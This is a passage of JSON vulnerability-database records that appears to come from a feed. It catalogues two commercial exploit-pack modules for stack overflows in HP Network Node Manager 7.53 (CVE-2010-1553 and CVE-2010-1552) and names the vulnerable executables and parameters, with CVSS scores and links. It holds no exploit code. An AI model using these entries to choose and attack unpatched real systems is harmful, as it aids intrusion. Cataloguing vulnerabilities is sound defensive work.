"description": "**Name**| d2sec_hpnnm5 \n---|--- \n**CVE**| CVE-2010-1553 \n**Exploit Pack**| [D2ExploitPack](<http://www.d2sec.com/products.htm>) \n**Description**| HP Network Node Manager 7.53 getnnmdata.exe MaxAge Variable Stack Overflow Vulnerability \n**Notes**| \n", "edition": 2, "modified": "2010-05-13T17:30:00", "published": "2010-05-13T17:30:00", "id": "D2SEC_HPNNM5", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hpnnm5", "title": "DSquare Exploit Pack: D2SEC_HPNNM5", "type": "d2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:08", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "description": "**Name**| d2sec_hpnnm6 \n---|--- \n**CVE**| CVE-2010-1552 \n**Exploit Pack**| [D2ExploitPack](<http://www.d2sec.com/products.htm>) \n**Description**| HP Network Node Manager 7.53 snmpviewer.exe act Variable Stack Overflow Vulnerability \n**Notes**| \n", "edition": 2, "modified": "2010-05-13T17:30:00", "published": "2010-05-13T17:30:00", "id": "D2SEC_HPNNM6", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hpnnm6", "title": "DSquare Exploit Pack: D2SEC_HPNNM6", "type": "d2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}